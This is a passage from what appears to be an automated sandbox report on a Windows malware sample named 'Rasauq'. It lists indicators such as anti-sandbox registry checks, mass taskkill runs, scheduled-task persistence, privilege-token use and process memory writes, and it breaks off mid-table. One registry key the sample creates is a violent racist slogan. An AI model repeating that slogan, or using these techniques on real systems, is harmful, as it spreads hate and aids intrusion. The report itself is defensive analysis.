Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Delays execution with timeout.exe 3 IoCs

pid	Process
1792	timeout.exe
4648	timeout.exe
5872	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 36 IoCs

pid	Process
5352	taskkill.exe
4400	taskkill.exe
1780	taskkill.exe
2932	taskkill.exe
3152	taskkill.exe
5432	taskkill.exe
2468	taskkill.exe
5052	taskkill.exe
1064	taskkill.exe
5240	taskkill.exe
3500	taskkill.exe
5932	taskkill.exe
5420	taskkill.exe
2968	taskkill.exe
252	taskkill.exe
5212	taskkill.exe
4168	taskkill.exe
2796	taskkill.exe
3416	taskkill.exe
4324	taskkill.exe
4936	taskkill.exe
1284	taskkill.exe
4180	taskkill.exe
4932	taskkill.exe
5420	taskkill.exe
3940	taskkill.exe
544	taskkill.exe
2528	taskkill.exe
312	taskkill.exe
4716	taskkill.exe
1680	taskkill.exe
3604	taskkill.exe
6088	taskkill.exe
1660	taskkill.exe
2532	taskkill.exe
1712	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866985932942743"	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform	reg.exe

Modifies registry class 62 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\Registry\User\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2123103809-19148277-2527443841-1000\{F07D32D2-6125-44D8-A24B-3ABE4E7DD8B6}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5436	schtasks.exe
1556	schtasks.exe
5108	schtasks.exe
3144	schtasks.exe
1988	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4940	powershell.exe
4940	powershell.exe
5056	powershell.exe
2648	powershell.exe
5056	powershell.exe
2648	powershell.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
240	powershell.exe
240	powershell.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
412	powershell.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
412	powershell.exe
2324	sRasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
1868	powershell.exe
1868	powershell.exe
6088	powershell.exe
6088	powershell.exe
4048	powershell.exe
4048	powershell.exe
5372	powershell.exe
5372	powershell.exe
2044	powershell.exe
2044	powershell.exe
3028	powershell.exe
3028	powershell.exe
5436	powershell.exe
5436	powershell.exe
2600	powershell.exe
2600	powershell.exe
2892	powershell.exe
2892	powershell.exe
5336	powershell.exe
5336	powershell.exe
3448	powershell.exe
3448	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
396	Process not Found
396	Process not Found
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeBackupPrivilege	1928	vssvc.exe
Token: SeRestorePrivilege	1928	vssvc.exe
Token: SeAuditPrivilege	1928	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4940	powershell.exe
Token: SeSecurityPrivilege	4940	powershell.exe
Token: SeTakeOwnershipPrivilege	4940	powershell.exe
Token: SeLoadDriverPrivilege	4940	powershell.exe
Token: SeSystemProfilePrivilege	4940	powershell.exe
Token: SeSystemtimePrivilege	4940	powershell.exe
Token: SeProfSingleProcessPrivilege	4940	powershell.exe
Token: SeIncBasePriorityPrivilege	4940	powershell.exe
Token: SeCreatePagefilePrivilege	4940	powershell.exe
Token: SeBackupPrivilege	4940	powershell.exe
Token: SeRestorePrivilege	4940	powershell.exe
Token: SeShutdownPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeSystemEnvironmentPrivilege	4940	powershell.exe
Token: SeRemoteShutdownPrivilege	4940	powershell.exe
Token: SeUndockPrivilege	4940	powershell.exe
Token: SeManageVolumePrivilege	4940	powershell.exe
Token: 33	4940	powershell.exe
Token: 34	4940	powershell.exe
Token: 35	4940	powershell.exe
Token: 36	4940	powershell.exe
Token: SeDebugPrivilege	2324	sRasauq SoftWorks.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeIncreaseQuotaPrivilege	240	powershell.exe
Token: SeSecurityPrivilege	240	powershell.exe
Token: SeTakeOwnershipPrivilege	240	powershell.exe
Token: SeLoadDriverPrivilege	240	powershell.exe
Token: SeSystemProfilePrivilege	240	powershell.exe
Token: SeSystemtimePrivilege	240	powershell.exe
Token: SeProfSingleProcessPrivilege	240	powershell.exe
Token: SeIncBasePriorityPrivilege	240	powershell.exe
Token: SeCreatePagefilePrivilege	240	powershell.exe
Token: SeBackupPrivilege	240	powershell.exe
Token: SeRestorePrivilege	240	powershell.exe
Token: SeShutdownPrivilege	240	powershell.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeSystemEnvironmentPrivilege	240	powershell.exe
Token: SeRemoteShutdownPrivilege	240	powershell.exe
Token: SeUndockPrivilege	240	powershell.exe
Token: SeManageVolumePrivilege	240	powershell.exe
Token: 33	240	powershell.exe
Token: 34	240	powershell.exe
Token: 35	240	powershell.exe
Token: 36	240	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeIncreaseQuotaPrivilege	412	powershell.exe
Token: SeSecurityPrivilege	412	powershell.exe
Token: SeTakeOwnershipPrivilege	412	powershell.exe
Token: SeLoadDriverPrivilege	412	powershell.exe
Token: SeSystemProfilePrivilege	412	powershell.exe
Token: SeSystemtimePrivilege	412	powershell.exe
Token: SeProfSingleProcessPrivilege	412	powershell.exe
Token: SeIncBasePriorityPrivilege	412	powershell.exe
Token: SeCreatePagefilePrivilege	412	powershell.exe
Token: SeBackupPrivilege	412	powershell.exe
Token: SeRestorePrivilege	412	powershell.exe
Token: SeShutdownPrivilege	412	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
5056	powershell.exe
2648	powershell.exe
3772	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 60 wrote to memory of 3056	60	Rasauq Launcher.exe	84
PID 60 wrote to memory of 3056	60	Rasauq Launcher.exe	84
PID 60 wrote to memory of 2324	60	Rasauq Launcher.exe	85
PID 60 wrote to memory of 2324	60	Rasauq Launcher.exe	85
PID 60 wrote to memory of 988	60	Rasauq Launcher.exe	86
PID 60 wrote to memory of 988	60	Rasauq Launcher.exe	86
PID 988 wrote to memory of 4776	988	cmd.exe	88
PID 988 wrote to memory of 4776	988	cmd.exe	88
PID 988 wrote to memory of 2820	988	cmd.exe	89
PID 988 wrote to memory of 2820	988	cmd.exe	89
PID 988 wrote to memory of 4732	988	cmd.exe	90
